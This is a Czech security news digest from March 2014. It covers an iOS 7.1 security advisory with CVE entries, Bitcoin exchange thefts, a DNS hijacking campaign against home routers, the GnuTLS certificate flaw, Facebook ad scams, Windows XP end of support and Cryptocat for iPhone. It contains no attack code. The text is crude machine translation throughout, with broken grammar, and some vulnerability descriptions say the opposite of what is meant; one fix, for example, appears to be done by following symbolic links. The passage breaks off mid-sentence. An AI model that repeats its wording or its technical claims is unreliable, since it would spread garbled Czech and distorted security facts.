Zvyšující se frekvence, sofistikovanost a obchodní dopad kybernetických útoků tlačil plánování a ochranu před operačním obavy z IT oddělení kybernetické na klíčové téma na strategické agendy desek a generálních ředitelů.

Senior úrovně podnikání se stále potýkají informační mezeru, která dělá to pro ně obtížné sladit investice do ochrany rizik na skutečné strategické hodnoty digitálních aktiv organizace; to, podle zprávy globální obchodní poradenské společnosti Bain & Company. Statistiky ukazují, , že:

Střední cena cybercrimes vyskočil o 56 procent na 5.900.000 dolar za organizaci v roce 2011 oproti roku 2010, nejnovější údaje nejsou k dispozici
Web-based útoky ve stejném období zvýšil na 4500 za den, což je 36 procentní růst
Mobilní malware čtyřnásobně v roce 2013, s Android útoků se zvýšil o neuvěřitelných 26 krát
DDoS útoky vzrostly o 27 procent ve stejném období
Finanční motivy nyní řídit téměř 95 procent počítačových útoků, umístěním cíl přímo na strategických aktiv, které mohou být obohaceny po porušení.
Každá organizace, která utrpěla nedávno narušení bezpečnosti, zpráva konstatuje, také už nějakou formu kybernetické bezpečnosti na místě. Za to, že příliš mnoho organizací nedaří sladit bezpečnostních funkcí s většími cílů a celkového rizikového apetitu IT. Zpráva poukazuje na odpojení mezi úsilím řízení rizik v organizaci a rozvoj potřebných schopností kybernetické bezpečnosti jako skryté příčiny za materiální příčiny jednotlivých incidentů , protože obchodní skupiny a IT se často nedaří diskutovat o vznikajících hrozeb nebo relativní důležitost různých druhů digitálních aktiv. Místo toho, podle zprávy Bain, povinnosti dodržování, nikoliv strategie dopady, jsou největší hnací silou pro kybernetické úvahy pro tři-v- čtyři CIO. Zjištění demonstruje přes-spoléhání na operační přístupy k bezpečnosti.


Apple iOS 7.1
10.3.2014 Mobil | Zranitelnosti

Zde je detailní informace o dnešní Apple verzí - jak iOS a Apple TV byla aktualizována

APPLE-SA-2014-03-10-1 iOS 7.1

iOS 7.1 je nyní k dispozici a řeší následující:

Zálohování
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: upraveného zálohování můžete změnit souborový systém
Popis: symbolický odkaz v záloze by být obnovena, což umožňuje
následné operace při obnovení zapisovat do zbytku
souborového systému. Tento problém byl vyřešen kontrolou pro symbolické odkazy
během procesu obnovení.
CVE-ID
CVE-2013-5133: evad3rs

Certifikát Důvěra politika
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: kořenové certifikáty byly aktualizované
Popis: Několik certifikáty byly přidány nebo odstraněny ze
seznamu systémových kořenů.

Profily konfigurace
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Profil vypršení termíny nebyly dodrženy
Popis: vypršení platnosti dat mobilních konfiguračních profilů byly
správně vyhodnoceny. Tento problém byl vyřešen díky lepší
manipulaci konfiguračních profilů.
CVE-ID
CVE-2014-1267

CoreCapture
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace může způsobit neočekávané systém
ukončení
Popis: dostupné problém tvrzení existoval v CoreCapture v
manipulaci s IOKit volání API. Tato otázka byla řešena prostřednictvím
dodatečného ověření vstupu z IOKit.
CVE-ID
CVE-2014-1271: Filippo Bigarella

Crash Reporting
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen změnit oprávnění na libovolné
soubory
Popis: CrashHouseKeeping následuje symbolické odkazy při
změně oprávnění k souborům. Tento problém byl vyřešen tím, že
následující symbolické odkazy při změně oprávnění k souborům.
CVE-ID
CVE-2014-1272: evad3rs

dyld
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Požadavky podepisování kódu lze obejít
Popis: Text stěhování pokyny v dynamických knihovnách může
být načten dyld bez záruky kód podpisu. Tato záležitost byla
řešena tím, že ignoruje pokyny textu přesídlení.
CVE-ID
CVE-2014-1273: evad3rs

FaceTime
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
přistupovat FaceTime kontakty ze zámku obrazovky
Popis: FaceTime kontakty na zamčené Přístroj může být vystaven působení
tím, že se nepodařilo FaceTime hovor z obrazovky uzamčení. Tento problém byl
vyřešen lepší manipulaci s FaceTime hovory.
CVE-ID
CVE-2014-1274

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného PDF souboru může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení z JPEG2000
obrázků v PDF souborech. Tento problém byl vyřešen lepší hranic
kontroly.
CVE-ID
CVE-2014-1275: Felix Groebert týmu Google Security

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru TIFF může vést k
neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
Popis: buffer overflow existoval v zacházení Libtiff v z TIFF
obrázků. Tento problém byl vyřešen prostřednictvím dodatečného ověření
TIFF.
CVE-ID
CVE-2012-2088

ImageIO
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Zobrazení upraveného souboru JPEG, může vést k
prozrazení obsahu paměťové
Popis: Neinicializovaný vydání access memory existoval v
zacházení Libjpeg ze markery JPEG, což vede k prozrazení
obsahu paměti. Tento problém byl vyřešen prostřednictvím dodatečného
ověření souborů JPEG.
CVE-ID
CVE-2013-6629: Michal Zalewski

IOKit HID akce
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: škodlivý aplikace mohou sledovat na akce uživatele v jiných
apps
Popis: Rozhraní v rámcových IOKit povolených škodlivých aplikací
pro sledování na uživatelské akce v jiných aplikacích. Tento problém byl vyřešen
díky zlepšené politiky řízení přístupu v rámci.
CVE-ID
CVE-2014-1276: Min Zheng Hui Xue, a Dr. Tao (Lenx) Wei z FireEye

iTunes Store
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Útočník man-in-the-middle může lákat uživatele na
stahování škodlivého aplikace pomocí Enterprise App ke stažení
Popis: Útočník s výsadní postavení sítě by
spoof síťové komunikace lákat uživatele na stahování
škodlivého aplikace. Tento problém byl zmírněn pomocí SSL a pobízet
uživatele během URL přesměrování.
CVE-ID
CVE-2014-1277: Stefan Esser

Jádro
K dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Lokální uživatel může být schopen způsobit neočekávané systémové
ukončení nebo spuštění libovolného kódu v jádře
Description: out of bounds paměti Přístup problém existoval v ARM
funkce ptmx_get_ioctl. Tento problém byl vyřešen lepší
kontrolou hranic.
CVE-ID
CVE-2014-1278: evad3rs

Prohlížeč
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Otevření upraveného dokumentu aplikace Microsoft Word může
vést k neočekávanému ukončení aplikace nebo spuštění nežádoucího kódu
spuštění
Popis: dvojitý bez vydání existoval v manipulaci s
dokumenty Microsoft Word. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1252: Felix Groebert z týmu Google Security

Fotografie backend
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Jakmile snímky vymažete, může stále vypadat na fotkách aplikaci pod
průhledné obrázky
Popis: Odstranění obrázku z knihovny aktiv ani odstranit
mezipaměti verze obrazu. Tento problém byl vyřešen díky
lepší správě paměti cache.
CVE-ID
CVE-2014-1281: Walter Hoelblinger z Hoelblinger.com, Morgan Adams,
Tom Pennington

Profily
Dostupné pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Konfigurační profil může být skryté od uživatele
Popis: konfiguračního profilu s dlouhým názvem by mohl být
zaveden do zařízení, ale byl nezobrazuje se v uživatelském rozhraní profilu.
Problém byl vyřešen lepší prací s názvy profilu.
CVE-ID
CVE-2014-1282: Assaf Hefetz, Yair Amit a Adi Sharabani z Skycure

Safari
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Pověření uživatele mohou být zveřejněny na nečekané stránky pomocí
funkce Automatické vyplňování
Popis: Safari může autofilled uživatelská jména a hesla
do pomocného rámu od jiné doméně, než na hlavním rámu. Tento
problém byl vyřešen lepší sledování původu.
CVE-ID
CVE-2013-5227: Niklas Malmgren z Klarna AB

Nastavení - Účty
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
zakázat Find My iPhone, aniž byste zadali iCloud hesla
Popis: Problém státní správy existoval v zacházení s
Find My iPhone stavu. Tento problém byl vyřešen lepší
manipulaci Find My iPhone stavu.
CVE-ID
CVE-2014-1284

Springboard
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Osoba s fyzickým přístupem k zařízení, může být schopen
vidět na domovskou obrazovku zařízení, i když je přístroj nebyl
aktivován
Popis: neočekávané ukončení aplikace při aktivaci
může způsobit, že telefon bude ukázat na domovskou obrazovku. Tento problém byl
vyřešen lepší zpracování chyb při aktivaci.
CVE-ID
CVE-2014-1285: Roboboi99

Springboard Screen Lock
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
Dopad: Vzdálený útočník může způsobit zámek displeje, aby
se stal odpovídat
Popis: otázka státní správa existoval v zámku obrazovce.
Tento problém byl vyřešen lepší správou státu.
CVE-ID
CVE-2014-1286: Bogdan Alecu M-sec.net

TelephonyUI Framework
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: webová stránka by mohla vyvolat zvukový volání FaceTime bez uživatelské
interakce
Popis: Safari nekonzultoval uživatele před zahájením
FaceTime-audio: / / URL. Tento problém byl vyřešen přidáním
řádku s potvrzením.
CVE-ID
CVE-2013-6835: Guillaume Rosse

USB Host
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: osoba s fyzickým přístupem k zařízení, může být schopen
způsobit spuštění libovolného kódu v režimu jádra
Popis: problém poškození paměti existoval v zacházení
zpráv USB. Tento problém byl vyřešen prostřednictvím dodatečného ověření
zpráv USB.
CVE-ID
CVE-2014-1287: Andy Davis NCC Group

Video Driver
dispozici pro: iPhone 4 a novější,
iPod touch (5. generace) a později, iPad 2 a později
dopadů: Přehrávání upraveného videa by mohlo vést k zařízení
stále nereaguje
Popis: null problém dereference existoval v zacházení s
MPEG- 4. kódované soubory. Tento problém byl vyřešen lepší
správou paměti.
CVE-ID
CVE-2014-1280: rg0rd

WebKit
k dispozici pro: iPhone 4 a novější,
iPod touch (5. generace), a později, iPad 2 a později
Dopad: Navštívení upravené www stránky může vést k
pádu aplikace nebo spuštění nežádoucího kódu
Popis: Několik problémy s poškozením paměti existovala v WebKit.
Tyto otázky byly řešeny prostřednictvím lepší správou paměti.
CVE-ID
CVE-2013-2909: Atte Kettunen z OUSPG
CVE-2013-2926: cloudfuzzer
CVE-2013-2928: Google Chrome bezpečnostní tým
CVE-2013-5196: Google Chrome bezpečnostní tým
CVE -2013-5197: Google Chrome bezpečnostní tým
CVE-2013-5198: Apple
CVE-2013-5199: Apple
CVE-2013-5225: Google Chrome bezpečnostní tým
CVE-2013-5228: Keen Team (@ K33nTeam) spolupracuje s organizací Zero Day HP
Iniciativa
CVE-2013-6625: cloudfuzzer
CVE-2013-6635: cloudfuzzer
CVE-2014-1269: Apple
CVE-2014-1270: Apple
CVE-2014-1289: Apple
CVE-2014-1290: ant4g0nist (segfault) spolupracuje s HP Zero Day
Initiative, Google Chrome bezpečnostní tým
CVE-2014-1291: Google Chrome bezpečnostní tým
CVE-2014-1292: Google Chrome bezpečnostní tým
CVE-2014-1293: Google Chrome bezpečnostní tým
CVE-2014-1294: Google Chrome bezpečnostní tým

Informace budou také zveřejněny na Apple Security aktualizace
webu:
http://support.apple.com/kb/HT1222


Apple aktualizoval whitepaper systému iOS

10.3.2014 Mobil
Aktualizace dokumentu k iOS odhaluje detailní informace o propracované bezpečnostní architektuře systémů zařízení iPhone a iPad.

33stránkový whitepaper nazvaný iOS Security byl vydán v únoru 2014 a je nyní k dispozici online (ve formátu PDF). Předchozí verze je datována do listopadu 2012, přibližně do doby, kdy firma Apple začala bezpečnosti věnovat zvýšenou pozornost. Nový dokument detailně popisuje nové bezpečnostní funkce, které byly uvedeny do systémů iOS, především verze 7: Snímač otisků prstů Touch ID, integrace jednotného přihlášení do korporátních aplikací a služeb, zabezpečení spojení konektivity Airdrop (ať už Wi-Fi nebo Bluetooth), iCloud Keychain pro generování a správu silných hesel a v neposlední řadě Secure Enclave, bezpečnostní koprocesor integrovaný do 64bitového procesoru Apple A7.

Whitepaper je podle bezpečnostních konzultantů zásadní změnou v přístupu Applu a jak říká Rich Mogull: „Obsahuje více informací o bezpečnosti iOS, než kdy Apple oficiálně uvolnil. Studiem tohoto dokumentu strávíme měsíce.“ Z tohoto pohledu se Apple donedávna choval jako Microsoft před deseti lety, kdy bylo zvykem uveřejňovat co nejméně informací o bezpečnostních standardech.

Detaily bezpečnostní architektury Apple, včetně její certifikace podle normy FIPS 140-2, nepochybně dále pomohou otevírat dveře do vládních agentur nebo korporací s extrémními bezpečnostními požadavky. „Řada profesionálů dosud nepovažovala produkty Apple za dostatečně zralé pro korporátní či státní bezpečnost, ale Apple se možná pomalu stává standardem v mobilní bezpečnosti. Již nyní jsou možná zařízení Apple zabezpečenější než jakékoli jiné běžně dostupné zařízení.“

To ale neznamená, že neexistuje spousta prostoru pro zlepšení, jak to ukázala poslední bezpečnostní konference RSA, kde bylo předvedeno několik způsobů, jak se mohou aplikace běžící na pozadí nerootovaného iPhonu dostat například ke všem dotekům na obrazovce a fungovat tedy jako typický keylogger. To představuje chybu spíše systémové architektury než autorů jednotlivých aplikací, i když na ty vina za bezpečnostní nedostatky nejčastěji padá. Na analýzu bezpečnostních slabin aplikací dostupných pro iOS se zaměřil výzkum firmy HP publikovaný v listopadu 2013. Testováno bylo více než 2000 mobilních aplikací používaných 600 velkými korporacemi v 50 zemích světa a jak se ukázalo, 90 procent z nich vykazovalo nějakou bezpečnostní slabinu či chování, od nepoužívání šifrování po data ukládaná v zařízení nebo dokonce přenášená po internetu.


Více Bitcoin krádeže, Bitcoin banka Flexcoin vypne
10.3.2014 Kriminalita

Pouhé dny po Mt. GOX podali návrh na konkurz , "Bitcoin banky" Flexcoin a Bitcoin výměnu Poloniex oznámily, že byly úspěšně terčem zlodějů. Zatímco Poloniex bude i nadále podnikat, správci Flexcoin se rozhodli ho vypnout.

"On 02.03.2014 Flexcoin byl napaden a okraden o všechny mince v horkém peněžence útočník utekl s 896 BTC, a rozdělit je do těchto dvou adresách:. 1NDkevapt4SWYFEmquCDBSf7DLMTNVggdu a 1QFcC5JitGwpFKqRDd9QNH3eGN56dCNgy6," oni oznámil dnes na hlavní stránce burzy. "Jako Flexcoin nemá prostředky, majetek nebo jinak, aby se vrátil z této ztráty, jsme zavírat dveře okamžitě." Dobrou zprávou pro uživatele, kteří využili možnost Flexicoin ze dne dát své mince do chladírenského skladu je, že jejich skrýš zůstal nedotčen, a může být zrušeno, jakmile se jejich identita ověřena. "Všichni ostatní uživatelé budou přesměrováni na Flexcoin je" Podmínky služby "," se nachází v "Flexcoin.com/118.html" dokument, který byl dohodnut na základě podpisu s Flexcoin, "pokračovali, a dodal, že se" pokusí spolupracovat s policií dohledat zdroj hack. " Také dnes, Poloniex 'majitel zveřejněny na BitcoinTalk, že hacker využil kódu zranitelnosti vůči . ukrást to, co činí 12,3 procenta všech Bitcoins na Poloniex Po vysvětlení, jak hacker provedl loupež, řekl, že nese plnou odpovědnost za to, co se stalo, a bude splácet dluh Jeho plán pro to je následující.:

Směnné fondy 12,3% krátké. Vzhledem k tomu, že není dostatek BTC na pokrytí bilance každého z nás, všechny zůstatky budou dočasně odečte 12,3%. Pochopte prosím, že toto je absolutní nutností - kdybych nedělal toto nastavení, lidé by se s největší pravděpodobností stáhne všechny své BTC co nejdříve, aby se ujistil, že nebyly ponechány v oněch zbývajících 12,3%. Kromě zřejmého vrácení většiny BTC je vyřazen z výměny, by to nebylo fér - někteří lidé by si všechny své peníze hned, a pár by se nic hned. Částka odečtena z bilancí každého z nás budou zaznamenány, a finanční prostředky získané z burzovních poplatků, stejně jako dary z mé vlastní kapsy (což není příliš hluboká, obávám se), bude pravidelně distribuovány všem uživatelům, kteří měli BTC odečteny. Výměna poplatky se zvýší urychlit vymáhání dluhu.

On také vyzval uživatele, aby místo výběry v okamžiku, protože nebudou zpracovávány v tomto okamžiku, a sdílí kroky se bude dělat, aby se stejný útok nelze napodobit.


300000 směrovače ohrožena v DNS únos kampaně
10.3.2014 Incidenty | Počítačový útok

Některé 300.000 potvrdila - ale s největší pravděpodobností mnohem více - se malá kancelář / domácí kanceláře (SOHO) routery byly ohroženy a jejich nastavení DNS změnil používat dvě IP adresy v Londýně, účinně umožňuje dosud neznámé útočníci provádět Man-in-the-middle útoky . "K dnešnímu dni jsme identifikovali více než 300.000 přístrojů, převážně v Evropě a Asii, které věříme, že byly zneužity v rámci této kampaně, ten, který sahá až do nejméně poloviny prosince roku 2013," hlásil výzkumníky Team Cymru, kteří zahlédl několik postižené TP-Link Wi-Fi routery v lednu začala vyšetřovat záležitost.

"Směrovače oba malé kanceláře / domácí kanceláře (SOHO), třídy zařízení, která uvedené Wi-Fi připojení, místní DNS, DHCP a služby zákazníkům, a nebyly s použitím výchozích hesel," poukázali. , ale některé z nich byly spuštěny verze firmware zranitelné Cross-Site Request padělání útoky, a alespoň jeden běhu firmware sportovní nedávno objevil . chybu, která umožňuje útočníkům ke stažení konfiguračního souboru přístroje, které, samozřejmě, obsahuje pověření pro správu Dotčené routery pocházejí od různých výrobců - výše uvedené TP-Link, D-Link, Micronet, a jiní - a oni jsou převážně nacházejí ve Vietnamu, Indii, Itálii, Thajsku, a Kolumbie, ale také v Srbsku, Ukrajině a Bosně a Hercegovině. Zajímavostí této kampaně je, že Zdá se, že v současné době jsou DNS dotazy zaslané těchto dvou IP adresy jsou předávány na legitimní servery. "Pokusy o přihlášení do místních bankovních webových stránek v postižených zemích, a stáhnout aktualizace softwaru od společnosti Adobe a další vše se zdá fungovat normálně, i když mnoho požadavků vyřešit nápadně pomalu nebo se nepodařilo dokončit. Webové stránky jsme testovali také se objevil na normálního zobrazení reklamy pomocí těchto DNS serverů, "výzkumníci zjistili. Takže buď to hmotnost ohrožena je příprava pro pozdější neplechu, nebo škoda již byla provedena. Vědci Team Cymru si všimli jisté podobnosti mezi touto kampaní a ještě jedna, která byla většinou omezena na cílení zákazníků z několika polských bank, ale k závěru, že "jemné rozdíly v tradecraft zaměstnaných je pravděpodobné, že [se] dodržují buď samostatné kampaně do stejné skupiny, nebo více aktérů s využitím stejné techniky pro různé účely. " Oni také dodal, že nevěří, že také nedávno objevil Měsíc červ cílení kampaně Linksys routery se montuje stejným útočníky. Vědci oznámily orgány o této kampani, a také výrobci z dotčených zařízení. Team Cymru mluvčí Steve Santorelli sdílet s PC Pro , že dvě IP adresy, které jsou DNS dotazy jsou přesměrovány jsou umístěny na strojích v Nizozemsku, ale jsou registrovány UK-založená společnost 3NT řešení. IP rozsahy této společnosti již dříve a opakovaně byl spojován s spamování stránkách. Vědci mají společné užitečné techniky pro zmírnění tohoto typu útoku v whitepaper . "Jako bar je stále aktivována pro ohrožení koncových stanic, počítačoví zločinci se obracejí na nové metody pro dosažení jejich požadovaných cílů, bez přístupu k počítačům obětí přímo. Kampaň je uvedeno v této zprávě je poslední v rostoucím trendu Team Cymru je pozorován kybernetických zločinců zaměřených SOHO routery, "oni poznamenal. Není divu, že zločinci jsou jít po těchto zařízení, za předpokladu, že jsou notoricky plné využitelnosti bezpečnostních děr, a uživatelé jsou laxní, pokud jde o změnu hesla výchozí správce?


Podvodníci se obrátit na Facebooku cílení
10.3.2014 Sociální sítě

Podvodníci jsou stále častěji využívají Facebook zaměřených nástrojů a důvěru uživatelů, aby se zasadila levné léčiv, značkové repliky a další výrobky v trendu připomínajícího tradiční spamu, podle BitDefender.

Přes 24 milionů uživatelů Facebooku jsou aktivní každý den na sociální síti ve Velké Británii a 33 milionů unikátních jednotlivci přihlásit každý měsíc. Šestiměsíční studie ukazuje, že rychlý růst sociálních sítí a přesnost svých reklamních nástrojů jsou výzvou zločince, aby nalákali uživatele Facebook s lákavými nabídkami, které mohou, stejně jako tradiční spamu, konec v ukradených uživatelských dat. Výzkum na 50.000 unikátních domén bylo zjištěno, že lékárna výrobky tvoří 33 procent podezřelých Facebooku inzerátů. Repliky tvoří 30 procent, hazard pokrývá o 18 procent a datování účtů na 19 procent. "Facebook je velmi komplexní seznam možností cílení, které umožňuje podvodníci maximalizovat jejich úspěch," říká Catalin Cosoi, Chief Security stratég BitDefender. "Skutečnost, že inzeráty jsou obsaženy v důvěryhodném prostředí určitě láká na více uživatelů než vaše průměrná spamu." možnosti Ad-cílení na Facebooku rozsahu od výběru věkové skupiny a zeměpisné oblasti, pro lidi se společnými zájmy. Na rozdíl od e-mailu spam, to umožňuje velmi přesné zacílení potenciálních obětí podvodu. "Populární příklady jsou reklamy na vysoce hodnotných cen, jako je elektronika, automobily a velké sumy peněz," dodává Catalin Cosoi. "Kliknutí se uživatelům podvodných schémat, že přesvědčit je, aby pryč citlivé údaje, jako je osobní nebo kreditní karty detaily. Mohou být také napálil do instalací škodlivý kus software, lákal do SMS loterie podvod nebo vzít do obchodů, které prodávají padělané zboží.


Microsoft snaha, aby uživatelé klesnout Windows XP pokračuje
10.3.2014 Zranitelnosti | Bezpečnost

Jako datum plánovaného odchodu do důchodu z Windows XP - pravděpodobně jeden z nejoblíbenějších produktů Microsoftu někdy - se blíží, společnost pokračuje ve svém pátrání, aby se co nejvíce uživatelů je to možné přejít na novější verzi operačního systému, pokud možno do systému Windows 8.1.

Plán byl byl na několik let, ale většina uživatelů XP se nepodařilo, aby tento krok pro své vlastní důvody, a Microsoft se snaží jumpstart posun v mnoha ohledech. Nedávno se pokusil naverbovat tech-důvtipný uživatelé pomoci jejich méně znalí přátelé a rodina upgrade na novější verzi systému Windows, a pokud nemohou (počítač je příliš starý), koupit si nový počítač a nový OS. Bohužel pro Microsoft, většina uživatelů zažil tuto výzvu jako špatně maskovaný prodejní hřiště, a bránil dělat změny. Skutečnost, že společnost ani poskytnout dobré aktualizační nástroj byl další kámen úrazu. Ten problém byl vyřešen den předtím, než včera, kdy společnost oznámila, že se spojil s Laplink poskytnout uživatelům Windows XP s volnou migraci dat nástroj, který bude kopírovat své soubory a nastavení ze svého Windows XP počítače do nového zařízení se systémem některou z novějších verzích systému Windows. Také dodal, že systém Windows XP Home nebo Professional edition, které nedělají změny budou upozorněni na to jednou měsíc počínaje dnem 08.3.2014 přes pop-up upozornění, že budou nabízet odkaz na společnosti Windows XP Konec webových stránkách podpory:

Ale to není všechno. Pokud budou i nadále používat OS, a také používat Security Essentials - na které, mimochodem, Microsoft bude i nadále dodávat antimalware podpisy až 14 července 2015 - se mohou těšit na bytí "otravovali" prostřednictvím jiného kanálu. Jakmile Security Essentials je aktualizován na nejnovější verzi (4.5), budou uživatelé Windows XP i nadále vidět varování v programu, a to system tray, že jejich počítač je "potenciálně nechráněný." No, existuje ještě další měsíc jít, dokud nezastaví verze obtěžování OS je podporovány, a těším se na setkání, jaké další nápady Microsoft přijde s další.


Hlavní mezery nalezené v řízení vznikajících technologií
10.3.2014 Zranitelnosti

SailPoint zveřejnil infographic, který nastiňuje nejnovější výsledky výzkumu, které ukazují, že zatímco globální podniky vítají - a v některých případech pověřily - využívání cloudu a mobilních technologií, které nemají IT kontroly na místě, aby řádně spravovat. Bez správné preventivní a detektiv řídí, tyto podniky jsou v konečném důsledku uvedení se zvýšené riziko podvodu, krádeže a porušování soukromí. Klikněte na infographic pro kompletní, velké verze:

Nedávná SailPoint je Market Pulse Survey našli komplexní IT prostředí, kde jsou podniky stále dohání k požadované úrovně dohledu a kontroly potřebné ovládat nové technologie jako součást jejich celkové bezpečnosti a řízení rizik programu. Infographic nastiňuje klíčová zjištění z průzkumu, včetně:
63% podniků se vyžaduje rozhodnutí, tvůrci hodnotit cloudové aplikace jako součást každého procesu zadávání veřejných zakázek software. Již 39% mission-critical aplikace jsou v současné době uloženy v oblaku, čímž se zvýší na 59% do roku 2016.
82% respondentů, aby zaměstnanci mohli používat své osobní zařízení pro přístup k firemním datům a aplikace na práci. Nicméně, cloud a bring-vaše-vlastní-zařízení (BYOD) trendy jsou nápadně chybí bezpečnostní programy většiny firem. Ve skutečnosti, tolik jak 41% respondentů přiznala k neschopnosti řídit cloud a BYOD jako součást jejich identity a přístupu strategie řízení.
Prohlubuje problém, méně než polovina respondentů mají postup na místě, aby se automaticky odstranit mission-critical data z mobilních zařízení, zatímco 46% respondentů nejsou ani důvěru ve své schopnosti udělit nebo zrušit přístup zaměstnanců k aplikacím v rámci celého svého IT prostředí .
Vzhledem k nedostatku viditelnosti, 52% respondentů připouští, že zaměstnanci mají číst nebo vidět firemních dokumentů, které by neměly mít přístup k, a 51% věří, že je to "jen otázkou času", než dojde k porušení bezpečnosti.


GnuTLS knihovna chyba otevírá cestu pro MITM útoky
10.3.2014 Zranitelnosti | Počítačový útok

Kritická kryptografický chyba podobná té, nedávno objevené v iOS a OS X byla odhalena existovat v knihovně kódů GnuTLS, široce používán v open source software a linuxových distribucí. "GnuTLS knihovna poskytuje podporu pro kryptografických algoritmů a protokolů jako Transport Layer Security (TLS). Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření, "bezpečnostní tým Red Hat je vysvětleno v bezpečí poradenství oznámil vydání aktualizace, která řeší problém. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem (CVE-2014-0092) místě." chyba byla objevena Nikos Mavrogiannopoulos z Red Hat Security Technologies Tým, v průběhu auditu GnuTLS pro Red Hat. Další chyba byla nalezena v cestě GnuTLS ovládal verze 1 X.509 certifikáty, které by mohly umožnit útočníkovi podařilo získat takový certifikát od důvěryhodné certifikační autority pro vydávání certifikátů pro jiné weby, které by být přijata GnuTLS jako platné (CVE-2009-5138). mají chyby byly opraveny a uživatelé GnuTLS se doporučuje přejít na aktualizovaných balíčků a restartovat všechny aplikace spojené s knihovnou GnuTLS, aby se změna projeví. Ostatní Projekty se přestěhovali opravit chybu v této knihovně, včetně Debian a Ubuntu , ale stovky dalších aplikací a operačních systémů používají to jsou ještě k tomu. vývojáři GnuTLS také poskytuje novou verzi knihovny, která řeší problém, a jak Alternativou k tomu, náplast, která dočasně zmírňuje ji. chyba je dost vážné, protože to by mohlo umožnit útočníkovi vydávat se za jinou webovou stránku a zachytit a dekódovat všechny šifrované provoz, který jde od koncového uživatele k serveru a zpět. příčinou chyba je, jako ve výše uvedeném případě Apple, zdánlivě jednoduchá a velmi snadno přehlédnout v zběžné kontroly - pár "goto vyčištění" volá na špatném místě, a škoda byla dělána. A zřejmě to bylo děláno lety - v roce 2005, nebo ještě dříve. Toto zjevení a podobnost mezi dvěma crypto nedostatky již způsobit, že některé on-line komentátoři spekulovat, že obě byly vloženy úmyslně zpravodajské komunity USA. To je, samozřejmě, jen teorie. Co je určitě známo, že knihovna GnuTLS je tak široce používané, že to bude trvat nějaký čas pro každý projekt použitím provést nezbytná bezpečnostní opravy.


Cryptocat nyní k dispozici pro iPhone
10.3.2014 Mobil

Cryptocat, populární open source aplikace, která umožňuje uživatelům chatovat on-line snadno a bezpečně, je nyní k dispozici pro uživatele iPhone (na Apple App Store), stejně. Cryptocat nejprve vzal podobu webové aplikace pro Mac OS X a rozšíření prohlížeče, která pro Chrome, Firefox, Safari, Opera a, ale v prosinci loňského roku tým za ním zveřejněna zdrojový kód pro Cryptocat pro iPhone a Android, a vyzvala bezpečnostní komunity, aby si jej a pomoci najít bezpečnostní chyby.

"Naším cílem bylo vždy na to, aby šifrované chatu zábavné a snadné použití, v první řadě," komentoval Cryptocat tvůrce Nadim Kobeissi v blogu oznámil Cryptocat pro iPhone. iPhone verze je nativní aplikace - používá rozhraní API systému iOS 'místo web kryptografie. "Cryptocat pro iPhone používá OTR protokol pro soukromé hovory, a naše pevně zrání pluralitní protokol pro skupinové konverzace. S naší současnou výzkumu mpOTR, doufáme, že se brzy nabídne vylepšenou globální standard, který přináší šifrovací systém Cryptocat je na jiné platformy jako dobře, "dodal Kobeissi. aplikace funguje bez problémů s klienty Cryptocat počítačových, takže to není nutné, aby všechny strany v rozhovoru použít aplikaci pro iPhone. Fungování a vzhled zůstal stejný. Kobeissi poznamenat, že vítají zpětnou vazbu od uživatelů a vyjmenoval některé budoucí vylepšení, které pracují na. verze aplikace již byla kritizována dobře známý iPhone forenzní expert Jonathan Zdziarski, kteří tvrdí, že Cryptocat je nabízen uživatele Historie pomíjivost chybí app. "Byl jsem opravdu nadšený, že vidět to app hit App Store, ale bohužel nezobrazí verze iOS, že byly psány s Ochrana osobních údajů / ohledem na bezpečnost," řekl varoval v přezkumu aplikace . "app zanechává poklad forenzních artefaktů, které mohou být zrušena z vašeho přístroje, pokud je to vůbec ukradeno, pirát, nebo zabavených orgány činnými v trestním řízení. Nejpozoruhodnější z nich je, že všechny vaše minulé psaní je přihlášen do Apple klávesnice vyrovnávací paměti , takže předchozí konverzace, včetně slovo se počítá, lze získat z přístroje. Cryptocat mohla bránit tím, že vypnete automatické opravy nebo psát jejich vlastní. " "Aplikace 